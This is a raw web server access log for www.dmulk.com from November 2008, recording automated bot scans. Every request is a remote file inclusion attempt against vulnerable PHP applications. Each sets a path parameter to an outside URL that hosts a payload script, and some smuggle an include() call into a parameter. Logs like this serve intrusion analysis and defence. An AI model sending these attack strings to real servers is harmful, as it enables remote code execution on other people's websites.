94.23.10.29 - - [29/Nov/2008:10:13:46 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:13:46 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:14:01 -0800] "GET /index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 200 7938 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:14:01 -0800] "GET /index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 200 7938 "-" "libwww-perl/5.812" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:14:42 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:14:42 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:10:14:58 -0800] "GET /logs/access_080719.log//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:15:27 -0800] "GET /logs/access_080707.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.143.139.18 - - [29/Nov/2008:10:15:51 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.autismcenter.or.kr/cgi-bin/files/spread? HTTP/1.1" 200 94805 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:16:31 -0800] "GET /logs/access_080928.log//index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:16:32 -0800] "GET /index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 200 7938 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:16:32 -0800] "GET /logs//index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:16:35 -0800] "GET /logs/access_080928.log//index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:16:35 -0800] "GET /index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 200 7938 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:16:35 -0800] "GET /logs//index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:18:07 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:18:08 -0800] "GET /lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.212.205.5 - - [29/Nov/2008:10:18:09 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:18:17 -0800] "GET /errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:18:19 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:10:18:20 -0800] "GET /lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:18:52 -0800] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:18:54 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 200 95499 "-" "libwww-perl/5.79" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:18:56 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:10:18:58 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:10:19:00 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:19:02 -0800] "GET /logs/access_080228.log//index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:19:03 -0800] "GET /logs/access_080228.log//index.php?view=page&pagename=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:19:05 -0800] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:19:05 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:19:06 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:29 -0800] "GET /logs/access_080418.log/errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:29 -0800] "GET /logs/access_080418.log/errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:29 -0800] "GET /errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:29 -0800] "GET /errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:30 -0800] "GET /logs/errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:30 -0800] "GET /logs/errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:19:32 -0800] "GET /logs/access_080402.log%20//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:19:39 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:19:39 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:19:43 -0800] "GET /logs/access_081027.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:53 -0800] "GET /logs/access_080216.log/errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:19:58 -0800] "GET /logs/access_080216.log/errors.php?error=http://pgeh.hs.kr/~meca/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:20:28 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:20:28 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:20:29 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:20:35 -0800] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:20:35 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:20:35 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:20:38 -0800] "GET /logs/access_081027.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:10:20:38 -0800] "GET /logs/access_080929.log//index.php?view=page&pagename=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:10:20:39 -0800] "GET /logs//index.php?view=page&pagename=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:10:20:39 -0800] "GET /index.php?view=page&pagename=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 200 7938 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:20:39 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:20:40 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:20:41 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:20:44 -0800] "GET /logs/access_080505.log/convert/mvcw.php?step=1&vwar_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:20:44 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:10:20:47 -0800] "GET /logs/access_080310.log//index.php?view=page&pagename=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:20:51 -0800] "GET /logs/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:20:52 -0800] "GET /errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:21:15 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:21:17 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:21:17 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:21:37 -0800] "GET /errors.php?error=http://www.stormpages.com/cindy/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:21:37 -0800] "GET /logs/access_080408.log/errors.php?error=http://www.stormpages.com/cindy/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:10:21:37 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/cindy/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:21:43 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:21:45 -0800] "GET /logs/access_080402.log%20//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:21:45 -0800] "GET /logs/access_080416.log%20//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:22:23 -0800] "GET /logs/access_080416.log%20//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:22:26 -0800] "GET /logs/access_080116.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:22:46 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:22:47 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:22:49 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:23:13 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:23:14 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:23:14 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:23:17 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:23:17 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:10:23:17 -0800] "GET /logs/access_080406.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:10:23:19 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:23:29 -0800] "GET /logs/access_080401.log//main.php?appserv_root=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:23:29 -0800] "GET /logs/access_080401.log//main.php?appserv_root=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:23:29 -0800] "GET /main.php?appserv_root=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:23:29 -0800] "GET /main.php?appserv_root=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:23:29 -0800] "GET /logs//main.php?appserv_root=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.46.145.6 - - [29/Nov/2008:10:23:29 -0800] "GET /logs//main.php?appserv_root=http://www.joannafabisiak.pl/cutenews//inc/lang/.log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:10:23:43 -0800] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:24:10 -0800] "GET /logs/access_081029.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:24:23 -0800] "GET /logs/access_081029.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.188.35.106 - - [29/Nov/2008:10:24:48 -0800] "GET /index.php?arquivo=http://generador-foolo.gratishost.com/b.txt??? HTTP/1.1" 200 94728 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
190.188.35.106 - - [29/Nov/2008:10:24:56 -0800] "GET /?path%5Bdocroot%5D=http://generador-foolo.gratishost.com/b.txt??? HTTP/1.1" 200 94744 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:25:16 -0800] "GET /logs/access_080228.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:25:16 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:25:16 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:10:25:32 -0800] "GET /logs/access_080928.log//index.php?view=page&pagename=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:26:07 -0800] "GET /logs/access_081029.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.154.74 - - [29/Nov/2008:10:26:26 -0800] "GET /logs/access_080522.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.154.74 - - [29/Nov/2008:10:26:26 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.154.74 - - [29/Nov/2008:10:26:34 -0800] "GET /logs/access_080504.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:36 -0800] "GET /logs/access_080824.log//tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:37 -0800] "GET /tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:37 -0800] "GET /logs//tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
201.0.144.143 - - [29/Nov/2008:10:26:39 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 200 95499 "-" "libwww-perl/5.79" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:42 -0800] "GET /logs/access_080824.log//tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:42 -0800] "GET /tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:43 -0800] "GET /logs//tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:44 -0800] "GET /logs/access_081101.log//tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:10:26:51 -0800] "GET /logs/access_081101.log//tcpro/includes/footer.html.inc.php?tc_config[app_root]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:26:58 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
